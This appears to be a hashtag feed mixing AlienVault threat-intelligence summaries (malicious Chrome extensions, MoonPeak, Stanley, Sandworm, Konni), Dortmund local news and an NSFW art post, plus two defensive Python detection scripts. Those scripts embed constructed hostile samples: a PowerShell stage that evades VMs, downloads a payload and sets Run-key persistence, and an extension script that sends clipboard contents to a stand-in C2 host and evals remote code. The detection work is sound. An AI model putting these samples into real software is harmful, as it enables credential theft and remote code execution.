Chrome Extensions: Are you getting more than you bargained for?

This analysis reveals the hidden dangers of certain Chrome extensions available on the Google Chrome Web Store. Despite the store's vetting process, some malicious extensions have slipped through, compromising user security. The study examines four examples of extensions with combined user bases exceeding 100,000, showcasing various security risks. These include undisclosed clipboard access to remote domains, data exfiltration, remote code execution capabilities, search hijacking, and cross-site scripting vulnerabilities. The extensions employ tactics such as command-and-control infrastructure with domain generation algorithms, user tracking, and brand impersonation. The research emphasizes the importance of caution when installing browser extensions, even from trusted sources, and recommends immediate uninstallation of the identified malicious extensions.

Pulse ID: 69778aef872cffc134e67ace
Pulse Link: https://otx.alienvault.com/pulse/69778aef872cffc134e67ace
Pulse Author: AlienVault
Created: 2026-01-26 15:40:31

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Chrome #ChromeExtension #Clipboard #CyberSecurity #Google #ICS #InfoSec #OTX #OpenThreatExchange #RAT #RCE #RemoteCodeExecution #Rust #bot #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Malware MoonPeak Executed via LNK Files

In January 2026, IIJ observed malicious LNK files targeting Korean users to execute the MoonPeak malware, attributed to North Korean threat actors. The infection chain begins with a LNK file that runs an obfuscated PowerShell script, which checks for analysis environments, creates additional scripts, and sets up persistence. The second stage downloads and executes a payload from GitHub, which is actually the MoonPeak malware. MoonPeak is obfuscated using ConfuserEx and communicates with a C2 server. The campaign utilizes GitHub for hosting malware, a technique known as Living Off Trusted Sites (LOTS). This attack demonstrates the ongoing threat posed by North Korean actors targeting various countries and individuals worldwide.

Pulse ID: 69777a203745e70e7425106f
Pulse Link: https://otx.alienvault.com/pulse/69777a203745e70e7425106f
Pulse Author: AlienVault
Created: 2026-01-26 14:28:48

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #GitHub #InfoSec #Korea #LNK #Malware #NorthKorea #OTX #OpenThreatExchange #PowerShell #RAT #Rust #bot #AlienVault

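
The chain summarized in the post above (Explorer-launched PowerShell, an encoded and hidden first stage, a sandbox check, a download from a trusted site, and a persistence write) is something a detection engineer can score from ordinary process-creation telemetry. The script below is an added example written for this page, not IIJ's or anyone else's published detection: it decodes a `-EncodedCommand` blob (base64 of UTF-16LE) and counts how many stages of the chain a single event exhibits. The events, the stage-1 script, the GitHub path, and the indicator lists are all constructed for the example and are not the campaign's real artifacts.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# and the payload is base64 of UTF-16LE text. The regex grabs the flag and the blob.
ENC_FLAG = re.compile(r"(?:^|\s)-([Ee][A-Za-z]*)\s+([A-Za-z0-9+/=]{16,})")

# Indicator lists are this example's assumptions, chosen to match the stages
# described in the post; a real rule set would be tuned to local telemetry.
TRUSTED_HOSTS = ("raw.githubusercontent.com", "github.com",
                 "objects.githubusercontent.com", "gist.github.com")
DOWNLOAD = re.compile(r"(?i)\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|"
                      r"DownloadString|DownloadFile|Start-BitsTransfer)\b")
SANDBOX = re.compile(r"(?i)Win32_ComputerSystem|Win32_BIOS|Win32_VideoController|"
                     r"VMware|VirtualBox|VBOX|QEMU|Hyper-V")
PERSIST = re.compile(r"(?i)CurrentVersion\\Run|schtasks|Register-ScheduledTask|\\Startup\\")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")


def decode_encoded_command(command_line):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    for m in ENC_FLAG.finditer(command_line):
        if "encodedcommand".startswith(m.group(1).lower()):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_event(event):
    """Map one process-creation event to the stages of the chain it exhibits."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    script = decoded if decoded is not None else cmd
    findings = []
    if event["parent_image"].lower().endswith("explorer.exe"):
        findings.append("launched-from-shell")  # a double-clicked LNK runs via Explorer
    if decoded is not None:
        findings.append("encoded-command")
    if HIDDEN.search(cmd):
        findings.append("hidden-window")
    if SANDBOX.search(script):
        findings.append("analysis-environment-check")
    if DOWNLOAD.search(script) and any(h in script.lower() for h in TRUSTED_HOSTS):
        findings.append("download-from-trusted-site")  # the LOTS pattern
    if PERSIST.search(script):
        findings.append("persistence")
    return findings


def triage(events, threshold=3):
    """Return (event id, findings) for events hitting at least `threshold` stages."""
    hits = []
    for ev in events:
        f = analyze_event(ev)
        if len(f) >= threshold:
            hits.append((ev["id"], f))
    return hits


def encode_command(script):
    """Produce the -EncodedCommand form PowerShell expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-1 script mirroring the described chain; the repository
# path is a placeholder, not a real indicator.
STAGE1 = r"""
$cs = Get-WmiObject Win32_ComputerSystem
if ($cs.Manufacturer -match 'VMware|VirtualBox') { exit }
$p = "$env:APPDATA\update.ps1"
(Invoke-WebRequest 'https://raw.githubusercontent.com/example-org/example-repo/main/stage2.txt').Content | Set-Content $p
Set-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name Updater -Value "powershell -w hidden -f $p"
"""

SAMPLE_EVENTS = [  # constructed, in the shape of Sysmon Event ID 1 fields
    {"id": "evt-1",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -w hidden -enc " + encode_command(STAGE1)},
    {"id": "evt-2",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for event_id, findings in triage(SAMPLE_EVENTS):
        print(event_id, findings)
```

Scoring on a count of stages rather than on any single indicator keeps the rule quiet on admins who legitimately run encoded or hidden PowerShell, while a first stage that checks for a hypervisor, fetches from GitHub and writes a Run key lights up every field at once.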

Veloroute 1: #Radverkehr (cycle traffic) gets priority on the secondary road network, parking pressure remains the central issue. The link from Burgwall to Mallinckrodtstraße moves closer. #Dortmund #Nordstadt #Politik #Rat #Stadtentwicklung #Verkehr #Mobilität
https://www.nordstadtblogger.de/veloroute-1-radverkehr-bekommt-vorfahrt-im-nebennetz-parkdruck-bleibt-zentrales-thema/
Veloroute 1: Cycle traffic gets priority on the secondary road network, parking pressure remains the central issue - Nordstadtblogger

In the Nordstadt, Veloroute 1 is taking shape: at the Innenstadt-Nord district council (Bezirksvertretung), the city administration presented the plans for sections 1A and 1B and made clear that the city wants to start construction in 2026. …

Nordstadtblogger
Goethe-Gymnasium gets more classrooms in the long term at the Entenpoth site. The administrative board secures use of the satellite site until 2035. #Dortmund #Bildung #Politik #Rat #Stadtplanung
https://www.nordstadtblogger.de/goethe-gymnasium-bekommt-langfristig-mehr-klassenraeume-am-entenpoth-standort/
Goethe-Gymnasium gets more classrooms in the long term at the Entenpoth site - Nordstadtblogger

Planning certainty for the Goethe-Gymnasium: its pupils are to be able to use additional rooms in the long term at the Entenpoth 34 site, the former Frenzelschule. The administrative board has come out in favour of continuing this satellite site until 31 July 2035 …

Nordstadtblogger

A $6,000 Russian Malware Toolkit with Chrome Web Store Guarantee

A new malware-as-a-service toolkit called 'Stanley' is being sold on Russian cybercrime forums for $2,000 to $6,000. It provides a turnkey website-spoofing operation disguised as a Chrome extension, with the premium tier promising guaranteed publication on the Chrome Web Store. The toolkit allows full-page website spoofing, element injection, push notifications, and backup domain rotation. It uses victims' IP addresses for tracking and implements a persistent polling mechanism to communicate with the command and control server. The malware's core attack involves website spoofing via iframe overlay, allowing attackers to harvest credentials while displaying legitimate URLs in the browser's address bar.

Pulse ID: 69772b44fe2e1c30ec984e32
Pulse Link: https://otx.alienvault.com/pulse/69772b44fe2e1c30ec984e32
Pulse Author: AlienVault
Created: 2026-01-26 08:52:20

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Chrome #ChromeExtension #CyberCrime #CyberSecurity #InfoSec #Malware #MalwareAsAService #OTX #OpenThreatExchange #RAT #Russia #bot #AlienVault

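The two Chrome extension posts above (the Web Store analysis near the top of this page and the Stanley toolkit post directly above) describe the same handful of capabilities: clipboard reads sent to a remote host, code fetched and executed at runtime, a replaced search provider, and a full-page iframe laid over the real site while the address bar still shows the legitimate URL. A triage pass over an unpacked extension can flag all of these before anyone installs it. The auditor below is an added example written for this page, not code from either report or from any extension it names; the permission weights, regex heuristics, sample manifest and sample content script are all constructed for the example.

```python
import json
import re

# Permissions that deserve a second look in an unfamiliar extension.
# Descriptions and severity weights are this example's own choice.
RISKY_PERMISSIONS = {
    "clipboardRead": ("read the clipboard", 3),
    "cookies": ("read site cookies", 3),
    "debugger": ("attach the DevTools debugger to tabs", 3),
    "scripting": ("inject scripts into pages", 2),
    "webRequest": ("observe or block traffic", 2),
    "declarativeNetRequest": ("rewrite or redirect traffic", 2),
    "history": ("read browsing history", 2),
    "nativeMessaging": ("talk to a native host program", 2),
    "tabs": ("read tab URLs and titles", 1),
    "webNavigation": ("track navigation", 1),
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Source patterns matching the behaviours described in the posts. These are
# heuristics for triage, not a substitute for reading the code.
SCRIPT_PATTERNS = [
    ("remote-code-execution", 3, re.compile(r"\beval\s*\(|new\s+Function\s*\(")),
    ("clipboard-read", 3, re.compile(r"navigator\.clipboard\.readText|execCommand\s*\(\s*['\"]paste")),
    ("iframe-injection", 2, re.compile(r"createElement\s*\(\s*['\"]iframe['\"]")),
    ("full-page-overlay", 2, re.compile(r"position\s*:\s*fixed[^'\"]*z-index\s*:\s*\d{7,}")),
    ("outbound-request", 1, re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon")),
]


def _hosts(manifest):
    """Host patterns from MV3 host_permissions and MV2-style permissions."""
    return set(manifest.get("host_permissions", [])) | {
        p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"}


def audit_manifest(manifest):
    findings = []
    for perm in manifest.get("permissions", []):
        if perm in RISKY_PERMISSIONS:
            desc, sev = RISKY_PERMISSIONS[perm]
            findings.append({"id": f"permission:{perm}", "severity": sev, "detail": desc})
    if _hosts(manifest) & BROAD_HOSTS:
        findings.append({"id": "broad-host-access", "severity": 2, "detail": "may run on every site"})
    for cs in manifest.get("content_scripts", []):
        if set(cs.get("matches", [])) & BROAD_HOSTS:
            findings.append({"id": "content-script-all-sites", "severity": 2,
                             "detail": "injected into every page: " + ", ".join(cs.get("js", []))})
            break
    if "search_provider" in manifest.get("chrome_settings_overrides", {}):
        findings.append({"id": "search-provider-override", "severity": 2,
                         "detail": "replaces the default search engine (hijacking if undisclosed)"})
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 form
        csp = csp.get("extension_pages", "")
    if re.search(r"unsafe-eval|script-src[^;]*\bhttps?:", csp):
        findings.append({"id": "csp-allows-eval-or-remote-script", "severity": 3, "detail": csp})
    return findings


def audit_scripts(scripts):
    findings = []
    for name, src in scripts.items():
        for fid, sev, pattern in SCRIPT_PATTERNS:
            if pattern.search(src):
                findings.append({"id": fid, "severity": sev, "detail": f"{name}: /{pattern.pattern}/"})
    return findings


def audit_extension(manifest_text, scripts):
    """Audit manifest JSON plus a {filename: source} map of its scripts."""
    findings = audit_manifest(json.loads(manifest_text)) + audit_scripts(scripts)
    ids = {f["id"] for f in findings}
    # Combinations are what turn "powerful" into "suspicious".
    if "clipboard-read" in ids and "outbound-request" in ids:
        findings.append({"id": "clipboard-exfiltration", "severity": 4,
                         "detail": "clipboard read plus network send"})
    if "iframe-injection" in ids and "full-page-overlay" in ids:
        findings.append({"id": "page-spoofing-overlay", "severity": 4,
                         "detail": "full-page iframe over the real site; address bar unchanged"})
    return sorted(findings, key=lambda f: -f["severity"])


def risk_score(findings):
    return sum(f["severity"] for f in findings)


# Constructed sample extension exhibiting the described behaviours.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Example Coupon Helper", "version": "1.0",
    "permissions": ["clipboardRead", "scripting", "tabs", "storage"],
    "host_permissions": ["<all_urls>"],
    "chrome_settings_overrides": {"search_provider": {
        "search_url": "https://search.example.invalid/?q={searchTerms}", "is_default": True}},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
})
SAMPLE_CONTENT_JS = r"""
const f = document.createElement('iframe');
f.src = 'https://login.example.invalid/' + location.hostname;
f.style = 'position:fixed;top:0;left:0;width:100%;height:100%;z-index:2147483647;border:0';
document.body.appendChild(f);
navigator.clipboard.readText().then(t => fetch('https://c2.example.invalid/clip', {method: 'POST', body: t}));
fetch('https://c2.example.invalid/task').then(r => r.text()).then(code => eval(code));
"""
BENIGN_MANIFEST = json.dumps({"manifest_version": 3, "name": "Example Notes",
                              "version": "1.0", "permissions": ["storage"]})

if __name__ == "__main__":
    result = audit_extension(SAMPLE_MANIFEST, {"content.js": SAMPLE_CONTENT_JS})
    for f in result:
        print(f["severity"], f["id"], "-", f["detail"])
    print("risk score:", risk_score(result))
```

Run it against the unpacked extension directory (read `manifest.json` and every `.js` it references) rather than the store listing, since the listing only shows permission prompts and says nothing about what the scripts do with them. Note that a Manifest V3 extension cannot honestly load remote code, so a `fetch` whose response reaches `eval` or `new Function` is a policy violation on its own, whatever the rest of the findings say.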

Sandworm behind cyberattack on Poland's power grid in late 2025

Pulse ID: 6976fb12433099e6fae6af59
Pulse Link: https://otx.alienvault.com/pulse/6976fb12433099e6fae6af59
Pulse Author: Tr1sa111
Created: 2026-01-26 05:26:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberAttack #CyberSecurity #InfoSec #OTX #OpenThreatExchange #Poland #RAT #Sandworm #Worm #bot #Tr1sa111


AI-Generated Malware Targets Blockchain Sector

The threat group Konni is targeting blockchain developers and engineers using AI-generated malware delivered through social engineering.

Pulse ID: 697556980d7cb28d19682fd8
Pulse Link: https://otx.alienvault.com/pulse/697556980d7cb28d19682fd8
Pulse Author: cryptocti
Created: 2026-01-24 23:32:40

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlockChain #CyberSecurity #InfoSec #Konni #Malware #OTX #OpenThreatExchange #RAT #SocialEngineering #bot #developers #cryptocti

Breeding program
In WTA the Ratkin have a secret breeding program. While it's an obligation to participate, I like to think they would make time for fun as well.

#mastoart #traditionalart #furryart #sketchpage #sketchdump #rat #wererat #feral #anthro #werewolftheapocalypse #worldofdarkness #ttrpg #ttrpgart #furrynsfw #nsfw